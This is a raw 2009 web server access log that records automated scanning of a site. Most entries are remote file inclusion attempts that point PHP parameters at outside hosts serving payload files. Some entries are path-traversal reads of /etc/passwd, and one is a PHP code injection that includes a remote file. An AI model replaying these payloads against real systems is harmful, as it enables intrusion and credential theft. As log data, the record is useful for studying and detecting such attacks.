202.131.226.52 - - [12/Nov/2009:03:16:23 -0600] "GET /logs/access_log.1241222400////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:03:17:28 -0600] "GET /logs/access_log.1242172800////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:03:17:28 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:03:17:34 -0600] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
91.137.0.63 - - [12/Nov/2009:03:17:39 -0600] "GET /errors.php?error=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 293 "-""-"
207.7.108.203 - - [12/Nov/2009:03:19:23 -0600] "GET /logs//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.7.108.203 - - [12/Nov/2009:03:19:23 -0600] "GET /logs/access_log.1253491200//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.7.108.203 - - [12/Nov/2009:03:19:23 -0600] "GET //modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.108 - - [12/Nov/2009:03:19:25 -0600] "GET /logs/access_log.1201651200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.7.108.203 - - [12/Nov/2009:03:19:27 -0600] "GET /logs/access_log.1251676800//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:03:20:00 -0600] "GET /logs/access_log.1254441600//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
207.7.108.203 - - [12/Nov/2009:03:20:36 -0600] "GET /logs/access_log.1241222400//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.7.108.203 - - [12/Nov/2009:03:21:45 -0600] "GET /logs/access_log.1249257600//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.7.108.203 - - [12/Nov/2009:03:21:45 -0600] "GET /logs/access_log.1241222400//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.7.108.203 - - [12/Nov/2009:03:21:45 -0600] "GET //modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.7.108.203 - - [12/Nov/2009:03:21:45 -0600] "GET /logs//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.55.106.156 - - [12/Nov/2009:03:22:25 -0600] "GET /logs/access_log.1124668800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
117.58.251.130 - - [12/Nov/2009:03:23:02 -0600] "GET /logs/index.php?l=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
117.58.251.130 - - [12/Nov/2009:03:23:02 -0600] "GET /index.php?l=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
117.58.251.130 - - [12/Nov/2009:03:23:03 -0600] "GET /logs/index.php?l=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
117.58.251.130 - - [12/Nov/2009:03:23:03 -0600] "GET /index.php?l=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
65.55.106.110 - - [12/Nov/2009:03:23:24 -0600] "GET /logs/access_log.1156204800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.156 - - [12/Nov/2009:03:24:25 -0600] "GET /logs/access_log.1122768000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.109.181 - - [12/Nov/2009:03:26:19 -0600] "GET /logs/access_log.1227052800 HTTP/1.1" 200 51391 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
65.55.110.50 - - [12/Nov/2009:03:28:34 -0600] "GET /logs/access_log.1204934400 HTTP/1.1" 200 2510 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
116.68.248.199 - - [12/Nov/2009:03:30:03 -0600] "GET /become_editor.php?theme_path=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
116.68.248.199 - - [12/Nov/2009:03:30:03 -0600] "GET /logs/access_log.1250294400/become_editor.php?theme_path=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
116.68.248.199 - - [12/Nov/2009:03:30:04 -0600] "GET /logs/become_editor.php?theme_path=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
116.68.248.199 - - [12/Nov/2009:03:30:04 -0600] "GET /logs/access_log.1251417600/become_editor.php?theme_path=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.110.70 - - [12/Nov/2009:03:32:53 -0600] "GET /logs/access_log.1139529600 HTTP/1.1" 200 460 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
202.131.226.52 - - [12/Nov/2009:03:35:54 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:03:35:54 -0600] "GET /logs/access_log.1242172800////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:03:36:32 -0600] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 200 212473 "-""Mozilla/5.0"
91.137.0.63 - - [12/Nov/2009:03:39:55 -0600] "GET /logs/errors.php?error=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 298 "-""-"
65.55.207.136 - - [12/Nov/2009:03:40:55 -0600] "GET /logs/access_log.1167523200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.64.75.54 - - [12/Nov/2009:03:42:02 -0600] "GET /logs/access_log.1236902400/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://pastie.org/661597.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
89.17.201.144 - - [12/Nov/2009:03:44:05 -0600] "GET /logs/access_log.1246060800/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.17.201.144 - - [12/Nov/2009:03:44:05 -0600] "GET /logs/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.17.201.144 - - [12/Nov/2009:03:44:05 -0600] "GET /ezusermanager_pwd_forgott.php?ezUserManager_Path=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.17.201.144 - - [12/Nov/2009:03:44:12 -0600] "GET /logs/access_log.1244937600/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.68.248.199 - - [12/Nov/2009:03:48:55 -0600] "GET /?sourcedir=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
116.68.248.199 - - [12/Nov/2009:03:48:55 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
116.68.248.199 - - [12/Nov/2009:03:48:55 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
116.68.248.199 - - [12/Nov/2009:03:49:10 -0600] "GET /logs/?sourcedir=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:03:49:34 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:03:49:39 -0600] "GET /logs/access_log.1242172800////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:03:50:29 -0600] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 200 212473 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:03:53:08 -0600] "GET /logs//pollphp/db//booth.php?include_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:03:53:08 -0600] "GET /logs/access_log.1230163200//pollphp/db//booth.php?include_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:03:53:08 -0600] "GET /logs/access_log.1231200000//pollphp/db//booth.php?include_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:03:53:08 -0600] "GET //pollphp/db//booth.php?include_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
116.68.248.199 - - [12/Nov/2009:03:53:24 -0600] "GET /logs/access_log.1251676800/?sourcedir=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.55.110.11 - - [12/Nov/2009:03:53:41 -0600] "GET /logs/access_log.1175126400 HTTP/1.1" 200 3090 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
70.38.112.174 - - [12/Nov/2009:03:54:08 -0600] "GET /bad_link.php?theme_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:03:54:09 -0600] "GET /logs/bad_link.php?theme_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:03:54:09 -0600] "GET /logs/access_log.1253923200/bad_link.php?theme_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:03:54:13 -0600] "GET /logs/access_log.1250553600/bad_link.php?theme_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.25.94.14 - - [12/Nov/2009:03:55:50 -0600] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:03:55:50 -0600] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
65.55.207.121 - - [12/Nov/2009:03:55:55 -0600] "GET /logs/access_log.1122854400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.25.94.14 - - [12/Nov/2009:03:56:23 -0600] "GET /logs/access_log.1245456000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.803"
65.55.207.123 - - [12/Nov/2009:03:56:24 -0600] "GET /logs/access_log.1217376000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.25.94.14 - - [12/Nov/2009:03:57:00 -0600] "GET /logs/access_log.1249171200//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.803"
65.55.207.100 - - [12/Nov/2009:03:57:54 -0600] "GET /logs/access_log.1213228800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.163.197.88 - - [12/Nov/2009:03:59:55 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:03:59:55 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:03:59:56 -0600] "GET /logs/access_log.1252627200//admin/business_inc/saveserver.php?thisdir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:04:00:08 -0600] "GET /logs/access_log.1253577600//admin/business_inc/saveserver.php?thisdir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:13:08 -0600] "GET //facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:13:08 -0600] "GET /logs/access_log.1243209600//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:13:08 -0600] "GET /logs//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:13:13 -0600] "GET /logs/access_log.1253404800//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:14:22 -0600] "GET //facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:14:22 -0600] "GET /logs/access_log.1253404800//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:14:22 -0600] "GET /logs//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:14:22 -0600] "GET /logs/access_log.1243209600//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:15:54 -0600] "GET /logs//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:15:54 -0600] "GET //facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:15:54 -0600] "GET /logs/access_log.1243209600//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:15:54 -0600] "GET /logs/access_log.1253404800//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:16:06 -0600] "GET //facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:16:12 -0600] "GET /logs//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:16:12 -0600] "GET /logs/access_log.1243209600//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:16:13 -0600] "GET /logs/access_log.1253404800//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:20:13 -0600] "GET /logs/access_log.1247011200//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:20:13 -0600] "GET /logs//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:20:13 -0600] "GET //facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:20:19 -0600] "GET /logs//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:20:19 -0600] "GET //facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:20:19 -0600] "GET /logs/access_log.1247011200//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:20:23 -0600] "GET /logs/access_log.1243209600//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:20:48 -0600] "GET /logs/access_log.1243209600//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.109.179 - - [12/Nov/2009:04:20:52 -0600] "GET /logs/access_log.1171929600 HTTP/1.1" 200 24451 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
77.221.130.17 - - [12/Nov/2009:04:20:57 -0600] "GET /logs/access_log.1247011200//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:20:57 -0600] "GET /logs//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:20:57 -0600] "GET //facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:21:08 -0600] "GET /logs/access_log.1243209600//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.207.53 - - [12/Nov/2009:04:21:54 -0600] "GET /logs/access_log.1149984000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.130.17 - - [12/Nov/2009:04:23:37 -0600] "GET //facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:23:38 -0600] "GET /logs/access_log.1247011200//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:23:39 -0600] "GET /logs//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:23:57 -0600] "GET /logs/access_log.1243209600//facileforms.frame.php?ff_compath=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:04:25:57 -0600] "GET /logs/access_log.1249171200//skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:04:25:57 -0600] "GET //skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:04:25:57 -0600] "GET /logs//skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:04:26:28 -0600] "GET /logs//skin/gallery/login.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:04:26:28 -0600] "GET /logs/access_log.1249171200//skin/gallery/login.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:04:26:28 -0600] "GET //skin/gallery/login.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:04:27:45 -0600] "GET /logs//skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:04:27:45 -0600] "GET //skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:04:27:45 -0600] "GET /logs/access_log.1249171200//skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:04:29:49 -0600] "GET //skin/gallery/login.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:04:29:49 -0600] "GET /logs//skin/gallery/login.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:04:29:49 -0600] "GET /logs/access_log.1249171200//skin/gallery/login.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
65.55.110.187 - - [12/Nov/2009:04:29:58 -0600] "GET /logs/access_log.1155600000 HTTP/1.1" 200 337 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30707)"
190.97.219.4 - - [12/Nov/2009:04:31:23 -0600] "GET /?custompluginfile[]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
190.97.219.4 - - [12/Nov/2009:04:31:37 -0600] "GET /logs/?custompluginfile[]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 212466 "-""libwww-perl/5.805"
157.100.230.82 - - [12/Nov/2009:04:32:02 -0600] "GET /logs//skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:04:32:02 -0600] "GET //skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:04:32:03 -0600] "GET /logs/access_log.1249171200//skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:04:34:14 -0600] "GET /logs/access_log.1249171200//skin/gallery/login.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:04:34:14 -0600] "GET /logs//skin/gallery/login.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:04:34:14 -0600] "GET //skin/gallery/login.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.139.67.116 - - [12/Nov/2009:04:34:52 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 301 "-""libwww-perl/5.64"
216.139.67.116 - - [12/Nov/2009:04:34:52 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 306 "-""libwww-perl/5.64"
216.139.67.116 - - [12/Nov/2009:04:34:52 -0600] "GET /logs/access_log.1238371200//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 328 "-""libwww-perl/5.64"
62.103.31.24 - - [12/Nov/2009:04:35:36 -0600] "GET //skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:04:35:36 -0600] "GET /logs//skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:04:35:37 -0600] "GET /logs/access_log.1249171200//skin/gallery/login.pgp?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
65.55.110.211 - - [12/Nov/2009:04:38:38 -0600] "GET /logs/access_log.1164585600 HTTP/1.1" 200 328 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
65.55.106.233 - - [12/Nov/2009:04:40:55 -0600] "GET /logs/access_log.1247875200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
116.127.121.116 - - [12/Nov/2009:04:41:29 -0600] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:04:41:29 -0600] "GET /logs/access_log.1252972800//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:04:41:29 -0600] "GET //ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:04:41:45 -0600] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:04:41:46 -0600] "GET //ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:04:41:46 -0600] "GET /logs/access_log.1252972800//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
